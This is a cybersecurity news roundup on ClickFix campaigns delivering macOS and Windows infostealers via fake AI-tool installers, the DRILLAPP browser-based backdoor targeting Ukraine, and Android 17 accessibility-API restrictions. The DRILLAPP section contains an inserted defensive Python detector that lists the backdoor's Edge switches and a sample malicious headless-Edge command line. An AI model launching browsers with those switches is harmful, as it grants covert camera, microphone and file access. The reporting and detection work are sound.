This article is a contributed piece from one of our valued partners.
ClickFix Campaigns Spread MacSync macOS Infostealer via Fake AI Tool Installers
Three different ClickFix campaigns have been found to act as a delivery vector for the deployment of a macOS information stealer called MacSync. “Unlike traditional exploit-based attacks, this method relies entirely on user interaction – usually in the form of copying and executing commands – making it particularly effective against users who may not appreciate the implications of running unknown and obfuscated terminal commands,” Sophos researchers Jagadeesh Chandraiah, Tonmoy Jitu, Dmitry Samosseiko, and Matt Wixey said. It’s currently not known if the campaigns are the work of the same threat actor. The use of ClickFix lures to distribute the malware was also flagged by Jamf Threat Labs in December 2025.
The details of the three campaigns are as follows - November 2025: A campaign that used OpenAI’s ChatGPT Atlas web browser as bait, delivered via sponsored search results on Google, to direct users to a fake Google Sites URL with a download button that, when clicked, displayed instructions to open the Terminal app and paste a command into it. This action downloaded a shell script that prompted the user to enter the system password and ran MacSync with user-level permissions. December 2025: A malvertising campaign that leveraged sponsored links tied to searches for queries like “how to clean up your Mac” on Google to lead users to shared conversations on the legitimate OpenAI ChatGPT site to give the impression that the links were safe. The ChatGPT conversations redirected victims to malicious GitHub-themed landing pages that tricked users into running malicious commands on the Terminal app.
February 2026: A campaign targeting Belgium, India, and parts of North and South America that distributed a new variant of MacSync delivered through ClickFix lures. The latest iteration supports dynamic AppleScript payloads and in-memory execution to evade static analysis, bypass behavioral detections, and complicate incident response. The shell script launched after running the Terminal command is designed to contact a hard-coded server and retrieve the AppleScript infostealer payload, while simultaneously taking steps to remove evidence of data theft. The stealer is equipped to harvest a wide range of data from compromised hosts, including exfiltrating credentials, files, keychain databases, and seed phrases from cryptocurrency wallets.
The latest findings suggest the threat actors are adapting the formula to stay one step ahead of security tools, while weaponizing the trust associated with ChatGPT conversations to convince users to run malicious commands. The new variant observed in the most recent campaign “likely represents the malware developer adjusting to OS and software security measures to maintain effectiveness,” Sophos said. “Refinements to the typical ClickFix social engineering tactics are therefore one way in which such campaigns may continue to evolve in the future.” In recent months, ClickFix campaigns have used legitimate platforms like Cloudflare Pages (pages.dev), Squarespace, and Tencent EdgeOne to host bogus instructions for installing developer tools like Anthropic’s Claude Code. The URLs are distributed via malicious search engine ads.
The instructions, as before, deceive victims into installing infostealer malware like Amatera Stealer instead. The social engineering attack has been codenamed InstallFix or GoogleFix. According to Nati Tal, head of Guardio Labs, similar infection chains lead to the deployment of Alien infostealer on Windows and Atomic Stealer on macOS. The PowerShell command executed after pasting and running the supposed installation command for Claude Code fetches a legitimate Chrome extension package within a malicious HTML Application (HTA) file, which then launches an obfuscated .NET loader for Alien in memory, per Tal.
“While traditional ClickFix attacks need to manufacture a reason for the user to run a command: a fake CAPTCHA, a fabricated error message, a bogus system prompt — InstallFix doesn’t need any of that,” Push Security said. “The pretext is simply the user wanting to install legit software.” According to Pillar Security, there have been at least 20 distinct malware campaigns that have targeted artificial intelligence (AI) and vibe coding tools between February and March 2026. These include code editors, AI agents, large language models (LLM) platforms, AI-powered browser extensions, AI video generators, and AI business tools. Of these, nine have been found to target both Windows and macOS, with another seven exclusively affecting macOS users.
“The reason is clear: AI/vibe coding tool users skew heavily toward macOS, and macOS users tend to have higher-value credentials (SSH keys, cloud tokens, cryptocurrency wallets),” Pillar Security researcher Eilon Cohen said. “The ClickFix/InstallFix technique (tricking users into pasting commands into Terminal) is uniquely effective against developers because curl | sh is a legitimate installation pattern. Homebrew, Rust, nvm, and many other developer tools use this exact pattern. The malicious commands hide in plain sight.” Needless to say, the advantage posed by ClickFix (and its variants) has led to the tactic being adopted by multiple threat actors and groups.
This includes a malicious traffic distribution system (TDS) named KongTuke (aka 404 TDS, Chaya_002, LandUpdate808, and TAG-124), which uses compromised WordPress websites and fake CAPTCHA lures to deliver a Python-based trojan called ModeloRAT. The attackers inject malicious JavaScript into legitimate WordPress websites that prompt users to run a PowerShell command responsible for initiating a multi-stage infection process to deploy the trojan. “The group continues to use this method alongside the newer CrashFix technique, which tricks users into installing a malicious browser extension to initiate infection,” Trend Micro said. “The malware specifically checks whether a system is part of a corporate domain and identifies installed security tools before continuing, suggesting a focus on enterprise environments rather than opportunistic infections.” That’s not all.
KongTuke campaigns have also been spotted using DNS TXT records in their ClickFix script. These DNS TXT records stage a command to retrieve and run a PowerShell script. Other ClickFix-style pastejacking attacks that have been detected in the wild are listed below:

- Using compromised websites to display lures for ClickFix pages that mimic Google’s “Aw Snap!” error or browser updates to distribute droppers, downloaders, and malicious browser extensions.
- Using ClickFix decoys served via malvertising/phishing links to direct users to malicious pages that lead to the deployment of Remcos RAT.
- Using a fake CAPTCHA verification lure on a phony website promoting a $TEMU airdrop scam to trigger the execution of a PowerShell command that runs arbitrary Python code retrieved from a server.
- Using a bogus website advertising CleanMyMac to trick users into running a malicious Terminal command to deploy a macOS stealer named SHub Stealer and backdoor cryptocurrency wallets such as Exodus, Atomic Wallet, Ledger Wallet, and Ledger Live to steal the seed phrases.
- Using a fake CAPTCHA verification lure on compromised websites to run a PowerShell script that delivers an MSI dropper, which then installs the Deno JavaScript runtime to execute obfuscated code that ultimately installs CastleRAT in memory by means of a Python loader named CastleLoader.

In a report published last week, Rapid7 revealed that highly trusted WordPress websites are being compromised as part of an ongoing, widespread campaign designed to inject a ClickFix implant impersonating a Cloudflare human verification challenge.
The activity has been active since December 2025. More than 250 infected websites have been identified in at least 12 countries, including Australia, Brazil, Canada, Czechia, Germany, India, Israel, Singapore, Slovakia, Switzerland, the U.K., and the U.S. The websites have been identified as regional news outlets and local businesses. The end goal of these lures is to compromise Windows systems with different stealer malware families: StealC Stealer, an improved version of Vidar Stealer, a .NET stealer dubbed Impure Stealer, and a C++ stealer referred to as VodkaStealer.
The stolen data can then act as a launchpad for financial theft or follow-on attacks. The exact method by which the WordPress sites are hacked is presently not known. However, it’s suspected to involve the exploitation of recently disclosed security flaws in WordPress plugins and themes, previously stolen admin credentials, or publicly accessible wp-admin interfaces. To counter the threat, site administrators are advised to keep their sites up-to-date, use strong passwords for administrative access, set up two-factor authentication (2FA), and scan for suspicious administrator accounts.
“The best defense for individuals browsing the web is to stay cautious, maintain a zero-trust mindset, use reputable security software, and keep themselves up to date with the latest phishing and ClickFix tactics used by malicious actors,” Rapid7 said. “An important takeaway from this report should be that even trusted websites can be compromised and weaponized against unsuspecting visitors.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
DRILLAPP Backdoor Targets Ukraine, Abuses Microsoft Edge Debugging for Stealth Espionage
Ukrainian entities have emerged as the target of a new campaign likely orchestrated by threat actors linked to Russia, according to a report from S2 Grupo’s LAB52 threat intelligence team. The campaign, observed in February 2026, has been assessed to share overlaps with a prior campaign mounted by Laundry Bear (aka UAC-0190 or Void Blizzard) aimed at Ukrainian defense forces with a malware family known as PLUGGYAPE. The attack activity “employs various judicial and charity themed lures to deploy a JavaScript‑based backdoor that runs through the Edge browser,” the cybersecurity company said. Codenamed DRILLAPP, the malware is capable of uploading and downloading files, leveraging the microphone, and capturing images through the webcam by taking advantage of the web browser’s features.
Two different versions of the campaign have been identified, with the first iteration detected in early February. The attack makes use of a Windows shortcut (LNK) file to create an HTML Application (HTA) in the temporary folder, which then loads a remote script hosted on Pastefy, a legitimate paste service. To establish persistence, the LNK files are copied to the Windows Startup folder so that they are automatically launched following a system reboot. The attack chain then displays a URL containing lures related to installing Starlink or a Ukrainian charity named Come Back Alive Foundation.
The HTML file is eventually executed via the Microsoft Edge browser in headless mode, which then loads the remote obfuscated script hosted on Pastefy. The browser is executed with additional parameters like --no-sandbox, --disable-web-security, --allow-file-access-from-files, --use-fake-ui-for-media-stream, --auto-select-screen-capture-source=true, and --disable-user-media-security, granting it access to the local file system, as well as camera, microphone, and screen capture without requiring any user interaction. The artifact essentially functions as a lightweight backdoor to facilitate file system access and capture audio from the microphone, video from the camera, and images of the device’s screen, all through the browser. It also generates a device fingerprint using a technique called canvas fingerprinting when run for the first time and uses Pastefy as a dead drop resolver to fetch a WebSocket URL used for command‑and‑control (C2) communications.
The malware transmits the device fingerprint data along with the victim’s country, which is determined from the machine’s time zone. It specifically checks if the time zones correspond to the U.K., Russia, Germany, France, China, Japan, the U.S., Brazil, India, Ukraine, Canada, Australia, Italy, Spain, and Poland. If that’s not the case, it defaults to the U.S. The second version of the campaign, spotted in late February 2026, eschews LNK files for Windows Control Panel modules, while keeping the infection sequence largely intact.
Another notable change involves the backdoor itself, which has now been upgraded to allow recursive file enumeration, batch file uploads, and arbitrary file download. “For security reasons, JavaScript does not allow the remote downloading of files,” LAB52 said. “This is why the attackers use the Chrome DevTools Protocol (CDP), an internal protocol of Chromium‑based browsers that can only be used when the --remote-debugging-port parameter is enabled.” It’s believed that the backdoor is still in the initial stages of development. An early variant of the malware detected in the wild on January 28, 2026, has been observed only communicating with the domain “gnome[.]com” instead of downloading the primary payload from Pastefy.
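The browser switches described above are the most concrete detection opportunity in this campaign: a user's Edge almost never runs headless with sandboxing and web security disabled. The following is an added detection example (not code from LAB52 or the report) that scores process command lines for that combination; the sample events and the alert thresholds are my own assumptions, not telemetry from the campaign.

```python
"""Detect Edge/Chromium launches that match the DRILLAPP command-line pattern.

Added detection example, not code from the LAB52 report. Process-creation
events (for example Sysmon Event ID 1 or EDR telemetry) are represented here as
plain command-line strings; the sample events below are constructed, not real.
"""
import re

# Switches the report lists on DRILLAPP's headless Edge launch, plus the
# remote debugging port the second variant needs for the Chrome DevTools Protocol.
RISKY_FLAGS = {
    "--no-sandbox",
    "--disable-web-security",
    "--allow-file-access-from-files",
    "--use-fake-ui-for-media-stream",
    "--auto-select-screen-capture-source",
    "--disable-user-media-security",
    "--remote-debugging-port",
}
BROWSER_BINARIES = {"msedge.exe", "chrome.exe"}

SAMPLE_EVENTS = [  # constructed command lines, not real telemetry
    r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default https://example.com',
    r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless --no-sandbox --disable-web-security --allow-file-access-from-files --use-fake-ui-for-media-stream --auto-select-screen-capture-source=true --disable-user-media-security C:\Users\user\AppData\Local\Temp\lure.html',
    r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --user-data-dir=C:\tmp\prof',
]


def assess(cmdline: str) -> dict:
    """Parse one process command line and decide whether it warrants an alert."""
    tokens = re.findall(r'"[^"]*"|\S+', cmdline)             # quote-aware split
    exe = tokens[0].strip('"').rsplit("\\", 1)[-1].lower()   # basename of the image
    # Keep switch names only: "--remote-debugging-port=9222" -> "--remote-debugging-port"
    flags = {t.split("=", 1)[0].lower() for t in tokens[1:] if t.startswith("--")}
    risky = sorted(flags & RISKY_FLAGS)
    headless = "--headless" in flags                          # also matches --headless=new
    # Alert on headless plus any isolation/media bypass, or on the debugging port
    # combined with another risky switch. A lone --remote-debugging-port is not
    # alerted on because browser automation tooling uses it legitimately.
    alert = exe in BROWSER_BINARIES and (
        (headless and bool(risky))
        or ("--remote-debugging-port" in flags and len(risky) >= 2)
    )
    return {"exe": exe, "headless": headless, "risky": risky, "alert": alert}


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        verdict = assess(event)
        print("ALERT" if verdict["alert"] else "ok   ", verdict["exe"], verdict["risky"])
```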
“One of the most notable aspects is the use of the browser to deploy a backdoor, which suggests that the attackers are exploring new ways to evade detection,” the Spanish security vendor said. “The browser is advantageous for this type of activity because it is a common and generally non‑suspicious process, it offers extended capabilities accessible through debugging parameters that enable unsafe actions such as downloading remote files, and it provides legitimate access to sensitive resources such as the microphone, camera, or screen recording without triggering immediate alerts.”
Android 17 Blocks Non-Accessibility Apps from Accessibility API to Prevent Malware Abuse
Google is testing a new security feature as part of Android Advanced Protection Mode (AAPM) that prevents certain kinds of apps from using the accessibility services API. The change, incorporated in Android 17 Beta 2, was first reported by Android Authority last week. AAPM was introduced by Google in Android 16, released last year. When enabled, it causes the device to enter a heightened security state to guard against sophisticated cyber attacks.
Like Apple’s Lockdown Mode, the opt-in feature prioritizes security at the cost of diminished functionality and usability so as to minimize the attack surface. Some of the core configurations include blocking app installation from unknown sources, restricting USB data signaling, and mandating Google Play Protect scanning. “Developers can integrate with this feature using the AdvancedProtectionManager API to detect the mode’s status, enabling applications to automatically adopt a hardened security posture or restrict high-risk functionality when a user has opted in,” Google noted in its documentation outlining Android 17’s features. The latest restriction added to the one-tap security setting aims to prevent apps that are not classified as accessibility tools from being able to leverage the operating system’s accessibility services API.
Verified accessibility tools, identified by the isAccessibilityTool="true" flag, are exempted from this rule. According to Google, only screen readers, switch-based input systems, voice-based input tools, and Braille-based access programs are designated as accessibility tools. Antivirus software, automation tools, assistants, monitoring apps, cleaners, password managers, and launchers do not fall under this category. While AccessibilityService has its legitimate use cases, such as assisting users with disabilities in using Android devices and apps, the API has been extensively abused by bad actors in recent years to steal sensitive data from compromised Android devices.
With the latest change, any non-accessibility app that already has the permission will have its privileges automatically revoked when AAPM is active. Users will also not be able to grant apps permissions to the API unless the setting is turned off. Android 17 also comes with a new contacts picker that allows app developers to specify only the fields they want to access from a user’s contact list (e.g., phone numbers or email addresses) or allow users to share certain contacts with a third-party app. “This grants your app read access to only the selected data, ensuring granular control while providing a consistent user experience with built-in search, profile switching, and multi-selection capabilities without having to build or maintain the UI,” Google said.